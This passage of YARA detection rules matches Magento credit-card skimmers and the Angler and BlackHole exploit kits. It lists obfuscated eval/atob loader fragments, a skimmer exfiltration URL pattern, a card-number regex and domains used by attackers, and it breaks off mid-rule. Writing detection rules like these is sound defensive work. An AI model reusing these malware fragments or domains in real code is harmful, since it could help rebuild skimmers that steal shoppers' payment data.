strings: $ = "\\x2F\\x6D\\x65\\x64\\x69\\x61\\x2F\\x63\\x61\\x74\\x61\\x6C\\x6F\\x67\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x2F\\x63\\x61\\x63\\x68\\x65\\x2F\\x31\\x2F\\x74\\x68\\x75\\x6D\\x62\\x6E\\x61\\x69\\x6C\\x2F\\x37\\x30\\x30\\x78\\x2F\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2F\\x42\\x2F\\x57\\x2F\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2E\\x70\\x68\\x70"
condition: any of them
}
rule ip_5uu8_com {
strings: $ = "\\x69\\x70\\x2e\\x35\\x75\\x75\\x38\\x2e\\x63\\x6f\\x6d"
condition: any of them
}
rule cloudfusion_me {
strings: $ = "cloudfusion.me"
condition: any of them
}
rule grelos_v {
strings: $ = "var grelos_v"
condition: any of them
}
rule hacked_domains {
strings:
$ = "infopromo.biz"
$ = "jquery-code.su"
$ = "jquery-css.su"
$ = "megalith-games.com"
$ = "cdn-cloud.pw"
$ = "animalzz921.pw"
$ = "statsdot.eu"
condition: any of them
}
rule mage_cdn_link {
strings: $ = "\\x6D\\x61\\x67\\x65\\x2D\\x63\\x64\\x6E\\x2E\\x6C\\x69\\x6E\\x6B"
condition: any of them
}
rule credit_card_regex {
strings: $ = "RegExp(\"[0-9]{13,16}\")"
condition: any of them
}
rule jquery_code_su {
strings: $ = "105,102,40,40,110,101,119,32,82,101,103,69,120,112,40,39,111,110,101,112,97,103,101"
condition: any of them
}
rule jquery_code_su_multi {
strings: $ = "=oQKpkyJ8dCK0lGbwNnLn42bpRXYj9GbENDft12bkBjM8V2Ypx2c8Rnbl52bw12bDlkUVVGZvNWZkZ0M85WavpGfsJXd8R1UPB1NywXZtFmb0N3box"
condition: any of them
}
rule Trafficanalyzer_js {
strings: $ = "z=x['length'];for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)-10) }w=this['unescape'](y);this['eval'](w);"
condition: any of them
}
rule atob_js {
strings: $ = "this['eval'](this['atob']('"
condition: any of them
}
rule gate_php_js {
/* token=KjsS29Msl&host= */
strings:
$ = /\/gate.php\?token=.{,10}&host=/
condition: any of them
}
rule googieplay_js {
strings: $ = "tdsjqu!tsd>#iuuq;00hpphjfqmbz/jogp0nbhfoup`hpphjfqmbz/kt#?=0tdsjqu?"
condition: any of them
}
rule mag_php_js {
strings:
$ = "onepage|checkout|onestep|firecheckout|onestepcheckout"
$ = "'one|check'"
condition: any of them
}
rule thetech_org_js {
strings: $ = "|RegExp|onepage|checkout|"
condition: any of them
}
rule md5_cdn_js_link_js {
strings: $ = "grelos_v= null"
condition: any of them
}
/*
This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/
rule AnglerEKredirector : EK
{
meta:
description = "Angler Exploit Kit Redirector"
ref = "http://blog.xanda.org/2015/08/28/yara-rule-for-angler-ek-redirector-js/"
author = "adnan.shukor@gmail.com"
date = "08-July-2015"
impact = "5"
version = "1"
strings:
$ekr1 = "<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000);" fullword
$ekr2 = "document.cookie=\"PHP_SESSION_PHP="
$ekr3 = "path=/; expires=\"+date.toUTCString();</script>" fullword
$ekr4 = "<iframe src=" fullword
$ekr5 = "</iframe></div>" fullword
condition:
all of them
}
rule angler_flash : EK
{
meta:
author = "Josh Berry"
date = "2016-06-26"
description = "Angler Exploit Kit Detection"
hash0 = "8081397c30b53119716c374dd58fc653"
sample_filetype = "unknown"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "(9OOSp"
$string1 = "r$g@ 0'[A"
$string2 = ";R-1qTP"
$string3 = "xwBtR4"
$string4 = "YbVjxp"
$string5 = "ddgXkF"
$string6 = ")n'URF"
$string7 = "vAzq@W"
$string8 = "rOkX$6m<"
$string9 = "@@DB}q "
$string10 = "TiKV'iV"
$string11 = "538x;B"
$string12 = "9pEM{d"
$string13 = ".SIy/O"
$string14 = "ER<Gu,"
condition:
14 of them
}
rule angler_flash2 : EK
{
meta:
author = "Josh Berry"
date = "2016-06-26"
description = "Angler Exploit Kit Detection"
hash0 = "23812c5a1d33c9ce61b0882f860d79d6"
sample_filetype = "unknown"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "4yOOUj"
$string1 = "CSvI4e"
$string2 = "'fwaEnkI"
$string3 = "'y4m%X"
$string4 = "eOc)a,"
$string5 = "'0{Q5<"
$string6 = "1BdX;P"
$string7 = "D _J)C"
$string8 = "-epZ.E"
$string9 = "QpRkP."
$string10 = "<o/]atel"
$string11 = "@B.,X<"
$string12 = "5r[c)U"
$string13 = "52R7F'"
$string14 = "NZ[FV'P"
condition:
14 of them
}
rule angler_flash4 : EK
{
meta:
author = "Josh Berry"
date = "2016-06-26"
description = "Angler Exploit Kit Detection"
hash0 = "dbb3f5e90c05602d92e5d6e12f8c1421"
sample_filetype = "unknown"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "_u;cwD;"
$string1 = "lhNp74"
$string2 = "Y0GQ%v"
$string3 = "qjqCb,nx"
$string4 = "vn{l{Wl"
$string5 = "5j5jz5"
$string6 = "a3EWwhM"
$string7 = "hVJb/4Aut"
$string8 = ",lm4v,"
$string9 = ",6MekS"
$string10 = "YM.mxzO"
$string11 = ";6 -$E"
$string12 = "QA%: fy"
$string13 = "<@{qvR"
$string14 = "b9'$'6l"
$string15 = ",x:pQ@-"
$string16 = "2Dyyr9"
condition:
16 of them
}
rule angler_flash5 : EK
{
meta:
author = "Josh Berry"
date = "2016-06-26"
description = "Angler Exploit Kit Detection"
hash0 = "9f809272e59ee9ecd71093035b31eec6"
sample_filetype = "unknown"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "0k%2{u"
$string1 = "\\Pb@(R"
$string2 = "ys)dVI"
$string3 = "tk4_y["
$string4 = "LM2Grx"
$string5 = "n}s5fb"
$string6 = "jT Nx<hKO"
$string7 = "5xL>>}"
$string8 = "S%,1{b"
$string9 = "C'3g7j"
$string10 = "}gfoh]"
$string11 = ",KFVQb"
$string12 = "LA;{Dx"
condition:
12 of them
}
rule angler_flash_uncompressed : EK
{
meta:
author = "Josh Berry"
date = "2016-06-26"
description = "Angler Exploit Kit Detection"
hash0 = "2543855d992b2f9a576f974c2630d851"
sample_filetype = "unknown"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "DisplayObjectContainer"
$string1 = "Xtime2"
$string2 = "(HMRTQ"
$string3 = "flash.events:EventDispatcher$flash.display:DisplayObjectContainer"
$string4 = "_e_-___-__"
$string5 = "ZviJbf"
$string6 = "random-"
$string7 = "_e_-_-_-_"
$string8 = "_e_------"
$string9 = "817677162"
$string10 = "_e_-__-"
$string11 = "-[vNnZZ"
$string12 = "5:unpad: Invalid padding value. expected ["
$string13 = "writeByte/"
$string14 = "enumerateFonts"
$string15 = "_e_---___"
$string16 = "_e_-_-"
$string17 = "f(fOJ4"
condition:
17 of them
}
rule angler_html : EK
{
meta:
author = "Josh Berry"
date = "2016-06-26"
description = "Angler Exploit Kit Detection"
hash0 = "afca949ab09c5583a2ea5b2006236666"
sample_filetype = "js-html"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = " A9 3E AF D5 9AQ FA 14 BC F2 A0H EA 7FfJ A58 A3 B1 BD 85 DB F3 B4 B6 FB B2 B4 14 82 19 88 28 D0 EA 2"
$string1 = " 2BS 25 26p 20 3F 81 0E D3 9C 84 C7 EC C3 C41M C48 D3 B5N 09 C2z 98 7B 09. DF 05 5EQ DF A3 B6 EE D5 "
$string2 = "9 A1Fg A8 837 9A A9 0A 1D 40b02 A5U6 22o 16 DC 5D F5 F5 FA BE FB EDX F0 87 DB C9 7B D6 AC F6D 10 1AJ"
$string3 = "24 AA 17 FB B0 96d DBN 05 EE F6 0F 24 D4 D0 C0 E4 96 03 A3 03 20/ 04 40 DB 8F 7FI A6 DC F5 09 0FWV 1"
$string4 = "Fq B3 94 E3 3E EFw E6 AA9 3A 5B 9E2 D2 EC AF6 10c 83 0F DF BB FBx AF B4 1BV 5C DD F8 9BR 97v D0U 9EG"
$string5 = "29 9B 01E C85 86 B0 09 EC E07 AFCY 19 E5 11 1C 92 E2 DA A9 5D 19P 3A BF AB D6 B3 3FZ B4 92 FF E1 27 "
$string6 = "B A9 88 B8 F0 EBLd 8E 08 18 11P EE BFk 15 5BM D6 B7 CEh AF 9C 8F 04 89 88 5E F6 ED 13 8EN1p 86Vk BC "
$string7 = "w F4 C8 16pV 22 0A BB EB 83 7D BC 89 B6 E06 8B 2A DC E6 7D CE. 0Dh 18 0A8 5E 60 0C BF A4 00M 00 E3 3"
$string8 = "B7 C6 E3 8E DC 3BR 60L 94h D8 AA7k5s 0D 7Fb 8B 80P E0 1BP EBT B5 03zE D0o 2A B97 18 F39 7C 94 99 11 "
$string9 = "kY 24 8E 3E 94 84 D2 00 1EB 16 A4 9C 28 24 C1B BB 22 7D 97c F5 BA AD C4 5C 23 5D 3D 5C A7d5 0C F6 EA"
$string10 = "08 01 3A 15 3B E0 1A E2 89 5B A2 F4 ED 87O F9l A99 124 27 BF BB A1c 2BW 12Z 07 AA D9 81 B7 A6-5 E2 E"
$string11 = " 16 BF A7 0E 00 16 BB 8FB CBn FC D8 9C C7 EA AC C2q 85n A96I D1 9B FC8 BDl B8 3Ajf 7B ADH FD 20 88 F"
$string12 = " ML "
$string13 = " AEJ 3B C7 BFy EF F07X D3 A0 1E B4q C4 BE 3A 10 E7 A0 FE D1Jhp 89 A0sj 1CW 08 D5 F7 C8 C6 D5I 81 D2 "
$string14 = "B 24 90 ED CEP C8 C9 9B E5 25 09 C6B- 2B 3B C7 28 C9 C62 EB D3 D5 ED DE A8 7F A9mNs 87 12 82 03 A2 8"
$string15 = "A 3A A2L DFa 18 11P 00 7F1 BBbY FA 5E 04 C4 5D 89 F3S DAN B5 CAi 8D 0A AC A8 0A ABI E6 1E 89 BB 07 D"
$string16 = "C B5 FD 0B F9 0Ch CE 01 14 8Dp AF 24 E0 E3 D90 DD FF B0 07 2Ad 0B 7D B0 B2 D8 BD E6 A7 CE E1 E4 3E5 "
$string17 = "19 0C 85 14r/ 8C F3 84 2B 8C CF 90 93 E2 F6zo C3 D40 A6 94 01 02Q 21G AB B9 CDx 9D FB 21 2C 10 C3 3C"
$string18 = "FAV D7y A0 C7Ld4 01 22 EE B0 1EY FAB BA E0 01 24 15g C5 DA6 19 EEsl BF C7O 9F 8B E8 AF 93 F52 00 06 "
condition:
18 of them
}
rule angler_html2 : EK
{
meta:
author = "Josh Berry"
date = "2016-06-26"
description = "Angler Exploit Kit Detection"
hash0 = "6c926bf25d1a8a80ab988c8a34c0102e"
sample_filetype = "js-html"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "E 06 E7i 1E 91q 9C D0J 1D 9B 14 E7g 1D DD ECK 20c 40 C6 0C AFR5 3D 03 9Em EC 0CB C9 A9 DFw C9 ADP 5B"
$string1 = "14Bc 5C 3Bp CB 2A 12 3D A56 AA 14 87 E3 81 8A 80h 27 1C 3A4 CE 12 AE FAy F0 8A 21 B8I AD 1E B9 2C D1"
$string2 = "0J 95 83 CC 1C 95D CAD 1A EA F3 00 E9 DA_ F2 ED 3CM1 A0 01t 1B EE 2C B6AWKq BF CAY FE D8 F2 7C 96 92"
$string3 = "A8MTCsn C9 DBu D3 10 A0 D4 AC A9 97 06Rn 01 DAK EFFN ADP AE 0E 8FJd 8F DA B6 25RO 18 2A 00 EA F9 8B "
$string4 = "A3 EB C1 CE 1E C4ok C4 19 F2 A7 17 9FCoz B6- C6 25J BB 0B 8C1OZ E4 7B AEz F6 06A 5D C0 D7 E8 FF DB D"
$string5 = " 07 DE A3 F8 B0 B3 20V A4 B2 C8 60 BD EEG 95 BB 04 1Ckw A4 80 E6 23 F02 FA 9C 9A 14F BDC 18 BE BD B4"
$string6 = "7 D1 B9 9B AC 2AN BA D3 00 A9 1CJ3J C0V 8F 8E FC B6p9 00 E1 01 21j B3 27 FF C3 8E 2B 92 8B DEiUI C3 "
$string7 = " 99 2C AF9 F9 3F5 A8 F0 1BU C8e/ 00Q B4 10 DD BC 9D 8A BF B2 17 8F BFd DB D1 B7 E66 21 96 86 1E B2 1"
$string8 = "E86 DF9 22Tg E93 9Em 29 0A 5B B5m E2 DCIF D6 D2 F5B CF F7XkRv BE EA A6 C5 82p 5E B3 B4aD B9 3A E0 22"
$string9 = " 7C 95.q D6f E8 1AE 17 82T 84 F1/O 82 C2q C7 FE 05C E4 E5W F5 0A E4l 12 3Brt 8A E0 E7 DDJ 1F 1F C4 A"
$string10 = "4t 91iE BD 2C 95U E9 1C AE 5B 5B A3 9D B2 F9 0B B5 15S9 AB 9D 94 85 A6 F1 AF B6 FC CAt 91iE BD 2C 95"
$string11 = " </input>"
$string12 = "2 D12 93 FD AB 0DKK AEN 40 DA 88 7B FA 3B 18 EE 09 92 ED AF A8b 07 002 0A A3S 04 29 F9 A3 EA BB E9 7"
$string13 = "40 C6 0C AFR5E 15 07 EE CBg B3 C6 60G 92tFt D7E 7D F0 C4 A89 29 EC BA E1 D9 3D 23 F0 0B E0o 3E2c B3 "
$string14 = "2 A3. A3 F1 D8 D4 A83K 9C AEu FF EA 02 F4 B8 A0 EE C9 7B 15 C1 07D 80 7C 10 864 96 E3 AA F8 99bgve D"
$string15 = "C 7D DC 0A E9 0D A1k 85s 9D 24 8C D0k E1 7E 3AH E2 052 D8q 16 FC 96 0AR C0 EC 99K4 3F BE ED CC DBE A"
$string16 = "40 DA 88 7B 9E 1A B3 FA DE 90U 5B BD6x 9A 0C 163 AB EA ED B4 B5 98 ADL B7 06 EE E5y B8 9B C9Q 00 E9 "
$string17 = "F BF_ F9 AC 5B CC 0B1 7B 60 20c 40 C6 0C AFR5 0B C7D 09 9D E30 14 AC 027 B2 B9B A7 06 E3z DC- B2 60 "
$string18 = "0 80 97Oi 8C 85 D2 1Bp CDv 11 05 D4 26 E7 FC 3DlO AE 96 D2 1B 89 7C 16H 11 86 D0 A6 B95 FC 01 C5 8E "
condition:
18 of them
}
rule angler_jar : EK
{
meta:
author = "Josh Berry"
date = "2016-06-26"
description = "Angler Exploit Kit Detection"
hash0 = "3de78737b728811af38ea780de5f5ed7"
sample_filetype = "unknown"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "myftysbrth"
$string1 = "classPK"
$string2 = "8aoadN"
$string3 = "j5/_<F"
$string4 = "FXPreloader.class"
$string5 = "V4w\\K,"
$string6 = "W\\Vr2a"
$string7 = "META-INF/MANIFEST.MF"
$string8 = "Na8$NS"
$string9 = "_YJjB'"
condition:
9 of them
}
rule angler_js : EK
{
meta:
author = "Josh Berry"
date = "2016-06-26"
description = "Angler Exploit Kit Detection"
hash0 = "482d6c24a824103f0bcd37fa59e19452"
sample_filetype = "js-html"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = " 2654435769, Be"
$string1 = "DFOMIqka "
$string2 = ", Zydr$>>16"
$string3 = "DFOMIqka( 'OPPj_phuPuiwzDFo')"
$string4 = "U0BNJWZ9J0vM43TnlNZcWnZjZSelQZlb1HGTTllZTm19emc0dlsYF13GvhQJmTZmbVMxallMdhWW948YWi t P b50GW"
$string5 = " auSt;"
$string6 = " eval (NDbMFR "
$string7 = "jWUwYDZhNVyMI2TzykEYjWk0MDM5MA%ZQ1TD1gEMzj 3 D ',"
$string8 = "('fE').substr (2 , 1 "
$string9 = ", -1 "
$string10 = " ) );Zydr$ [ 1]"
$string11 = " 11;PsKnARPQuNNZMP<9;PsKnARPQuNNZMP"
$string12 = "new Array (2), Ykz"
$string13 = "<script> "
$string14 = "); CYxin "
$string15 = "Zydr$ [ 1]"
$string16 = "var tKTGVbw,auSt, vnEihY, gftiUIdV, XnHs, UGlMHG, KWlqCKLfCV;"
$string17 = "reXKyQsob1reXKyQsob3 "
condition:
17 of them
}
/*
This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/
rule blackhole2_jar : EK
{
meta:
author = "Josh Berry"
date = "2016-06-27"
description = "BlackHole2 Exploit Kit Detection"
hash0 = "86946ec2d2031f2b456e804cac4ade6d"
sample_filetype = "unknown"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "k0/3;N"
$string1 = "g:WlY0"
$string2 = "(ww6Ou"
$string3 = "SOUGX["
$string4 = "7X2ANb"
$string5 = "r8L<;zYH)"
$string6 = "fbeatbea/fbeatbee.classPK"
$string7 = "fbeatbea/fbeatbec.class"
$string8 = "fbeatbea/fbeatbef.class"
$string9 = "fbeatbea/fbeatbef.classPK"
$string10 = "fbeatbea/fbeatbea.class"
$string11 = "fbeatbea/fbeatbeb.classPK"
$string12 = "nOJh-2"
$string13 = "[af:Fr"
condition:
13 of them
}
rule blackhole2_jar2 : EK
{
meta:
author = "Josh Berry"
date = "2016-06-27"
description = "BlackHole2 Exploit Kit Detection"
hash0 = "add1d01ba06d08818ff6880de2ee74e8"
sample_filetype = "unknown"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "6_O6d09"
$string1 = "juqirvs.classPK"
$string2 = "hw.classPK"
$string3 = "a.classPK"
$string4 = "w.classuS]w"
$string5 = "w.classPK"
$string6 = "YE}0vCZ"
$string7 = "v)Q,Ff"
$string8 = "%8H%t("
$string9 = "hw.class"
$string10 = "a.classmV"
$string11 = "2CniYFU"
$string12 = "juqirvs.class"
condition:
12 of them
}
rule blackhole2_jar3 : EK
{
meta:
author = "Josh Berry"
date = "2016-06-27"
description = "BlackHole2 Exploit Kit Detection"
hash0 = "c7abd2142f121bd64e55f145d4b860fa"
sample_filetype = "unknown"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "69/sj]]o"
$string1 = "GJk5Nd"
$string2 = "vcs.classu"
$string3 = "T<EssB"
$string4 = "1vmQmQ"
$string5 = "Kf1Ewr"
$string6 = "c$WuuuKKu5"
$string7 = "m.classPK"
$string8 = "chcyih.classPK"
$string9 = "hw.class"
$string10 = "f';;;;{"
$string11 = "vcs.classPK"
$string12 = "Vbhf_6"
condition:
12 of them
}
rule blackhole2_pdf : EK PDF
{
meta:
author = "Josh Berry"
date = "2016-06-27"
description = "BlackHole2 Exploit Kit Detection"
hash0 = "d1e2ff36a6c882b289d3b736d915a6cc"
sample_filetype = "pdf"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "/StructTreeRoot 5 0 R/Type/Catalog>>"
$string1 = "0000036095 00000 n"
$string2 = "http://www.xfa.org/schema/xfa-locale-set/2.1/"
$string3 = "subform[0].ImageField1[0])/Subtype/Widget/TU(Image Field)/Parent 22 0 R/F 4/P 8 0 R/T<FEFF0049006D00"
$string4 = "0000000026 65535 f"
$string5 = "0000029039 00000 n"
$string6 = "0000029693 00000 n"
$string7 = "%PDF-1.6"
$string8 = "27 0 obj<</Subtype/Type0/DescendantFonts 28 0 R/BaseFont/KLGNYZ"
$string9 = "0000034423 00000 n"
$string10 = "0000000010 65535 f"
$string11 = ">stream"
$string12 = "/Pages 2 0 R%/StructTreeRoot 5 0 R/Type/Catalog>>"
$string13 = "19 0 obj<</Subtype/Type1C/Length 23094/Filter/FlateDecode>>stream"
$string14 = "0000003653 00000 n"
$string15 = "0000000023 65535 f"
$string16 = "0000028250 00000 n"
$string17 = "iceRGB>>>>/XStep 9.0/Type/Pattern/TilingType 2/YStep 9.0/BBox[0 0 9 9]>>stream"
$string18 = "<</Root 1 0 R>>"
condition:
18 of them
}
rule blackhole_basic : EK
{
strings:
$a = /\.php\?\.*\?\:[a-zA-Z0-9\:]{6,}\&\.*\?\&/
condition:
$a
}
rule blackhole1_jar
{
meta:
author = "Josh Berry"
date = "2016-06-26"
description = "BlackHole1 Exploit Kit Detection"
hash0 = "724acccdcf01cf2323aa095e6ce59cae"
sample_filetype = "unknown"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "Created-By: 1.6.0_18 (Sun Microsystems Inc.)"
$string1 = "workpack/decoder.classmQ]S"
$string2 = "workpack/decoder.classPK"
$string3 = "workpack/editor.classPK"
$string4 = "xmleditor/GUI.classmO"
$string5 = "xmleditor/GUI.classPK"
$string6 = "xmleditor/peers.classPK"
$string7 = "v(SiS]T"
$string8 = ",R3TiV"
$string9 = "META-INF/MANIFEST.MFPK"
$string10 = "xmleditor/PK"
$string11 = "Z[Og8o"
$string12 = "workpack/PK"
condition:
12 of them
}
rule blackhole2_css : EK
{
meta:
author = "Josh Berry"
date = "2016-06-27"
description = "BlackHole2 Exploit Kit Detection"
hash0 = "9664a16c65782d56f02789e7d52359cd"
sample_filetype = "js-html"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string1 = "background:url('%%?a=img&img=countries.gif')"
$string2 = "background:url('%%?a=img&img=exploit.gif')"
$string3 = "background:url('%%?a=img&img=oses.gif')"
$string4 = "background:url('%%?a=img&img=browsers.gif')"
$string5 = "background:url('%%?a=img&img=edit.png')"
$string6 = "background:url('%%?a=img&img=add.png')"
$string7 = "background:url('%%?a=img&img=accept.png')"
$string8 = "background:url('%%?a=img&img=del.png')"
$string9 = "background:url('%%?a=img&img=stat.gif')"
condition:
18 of them
}
rule blackhole2_htm : EK
{
meta:
author = "Josh Berry"
date = "2016-06-27"
description = "BlackHole2 Exploit Kit Detection"
hash0 = "92e21e491a90e24083449fd906515684"
hash1 = "98b302a504a7ad0e3515ab6b96d623f9"
hash2 = "a91d885ef4c4a0d16c88b956db9c6f43"
hash3 = "d8336f7ae9b3a4db69317aea105f49be"
hash4 = "eba5daf0442dff5b249274c99552177b"
hash5 = "02d8e6daef5a4723621c25cfb766a23d"
hash6 = "dadf69ce2124283a59107708ffa9c900"
hash7 = "467199178ac940ca311896c7d116954f"
hash8 = "17ab5b85f2e1f2b5da436555ea94f859"
sample_filetype = "js-html"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = ">links/</a></td><td align"
$string1 = ">684K</td><td>"
$string2 = "> 36K</td><td>"
$string3 = "move_logs.php"
$string4 = "files/"
$string5 = "cron_updatetor.php"
$string6 = ">12-Sep-2012 23:45 </td><td align"
$string7 = "> - </td><td>"
$string8 = "cron_check.php"
$string9 = "-//W3C//DTD HTML 3.2 Final//EN"
$string10 = "bhadmin.php"
$string11 = ">21-Sep-2012 15:25 </td><td align"
$string12 = ">data/</a></td><td align"
$string13 = ">3.3K</td><td>"
$string14 = "cron_update.php"
condition:
14 of them
}
rule blackhole2_htm10 : EK
{
meta:
author = "Josh Berry"
date = "2016-06-27"
description = "BlackHole2 Exploit Kit Detection"
hash0 = "83704d531c9826727016fec285675eb1"
hash1 = "103ef0314607d28b3c54cd07e954cb25"
hash2 = "16c002dc45976caae259d7cabc95b2c3"
hash3 = "fd84d695ac3f2ebfb98d3255b3a4e1de"
hash4 = "c7b417a4d650c72efebc2c45eefbac2a"
hash5 = "c3c35e465e316a71abccca296ff6cd22"
hash2 = "16c002dc45976caae259d7cabc95b2c3"
hash7 = "10ce7956266bfd98fe310d7568bfc9d0"
hash8 = "60024caf40f4239d7e796916fb52dc8c"
sample_filetype = "js-html"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = "</body></html>"
$string1 = "/icons/back.gif"
$string2 = ">373K</td><td>"
$string3 = "/icons/unknown.gif"
$string4 = ">Last modified</a></th><th><a href"
$string5 = "tmp.gz"
$string6 = ">tmp.gz</a></td><td align"
$string7 = "nbsp;</td><td align"
$string8 = "</table>"
$string9 = "> - </td><td>"
$string10 = ">filefdc7aaf4a3</a></td><td align"
$string11 = ">19-Sep-2012 07:06 </td><td align"
$string12 = "><img src"
$string13 = "file3fa7bdd7dc"
$string14 = " <title>Index of /files "
$string15 = "0da49e042d"
condition:
15 of them
}
rule blackhole2_htm11 : EK
{
meta:
author = "Josh Berry"
date = "2016-06-27"
description = "BlackHole2 Exploit Kit Detection"
hash0 = "e89b56df597688c489f06a0a6dd9efed"
hash1 = "06ba331ac5ae3cd1986c82cb1098029e"
hash2 = "a899dedb50ad81d9dbba660747828c7b"
hash3 = "7cbb58412554327fe8b643204a046e2b"
hash2 = "a899dedb50ad81d9dbba660747828c7b"
hash0 = "e89b56df597688c489f06a0a6dd9efed"
hash2 = "a899dedb50ad81d9dbba660747828c7b"
hash7 = "530d31a0c45b79c1ee0c5c678e242c02"
hash2 = "a899dedb50ad81d9dbba660747828c7b"
sample_filetype = "js-html"
yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
strings:
$string0 = ">